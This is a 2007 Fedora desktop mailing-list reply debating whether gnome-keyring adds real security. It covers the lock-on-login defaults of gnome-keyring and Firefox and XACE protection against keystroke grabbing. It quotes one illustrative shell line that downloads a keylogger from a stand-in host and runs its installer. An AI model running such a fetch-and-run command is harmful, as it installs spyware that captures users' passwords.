Hey, Ugh, it would be nice if your mail client broke lines properly; it's at least a mess for me when using Evolution. On Mon, 2007-08-20 at 13:26 -0400, Colin Walters wrote: > Unrelated but - in my opinion gnome-keyring adds > very little in terms of security to this scenario. > > wget http://my.favorite.keylogger.example.com/linux-x86.tgz && \ > tar xzvf *.tgz && sh keylogger/install.sh Two things - It's a fair goal to ensure that users don't have to enter any passwords and I think gnome-keyring and other password stores (like the one in Firefox) helps with that. Especially if it's automatically unlocked when you log in. It's also pretty damn convenient that I don't have to type in these passwords all the time. Plus I can rest assured that if my laptop is stolen, some of my passwords are encrypted (ask blizzard about getting his laptop stolen). FWIW, I consider it a bug that the password store in e.g. Firefox isn't locked the same way we lock gnome-keyring; I know the option in Firefox is there but we just uncheck it by default so you get plaintext passwords. (Of course another solution to the "unlock keyring" problem is just to use encrypted home directories) - It's just a bug [1] that an unprivileged process like your keylogger can grab key presses while the gnome keyring password dialog is focused. With things like XACE, we can prevent that and only allow privileged applications like e.g. a screen reader / on screen keyboard to do this. Of course you can now turn this into a discussion about trusted path. David [1] : or misfeature, whatever -- Fedora-desktop-list mailing list Fedora-desktop-list@xxxxxxxxxx https://www.redhat.com/mailman/listinfo/fedora-desktop-list
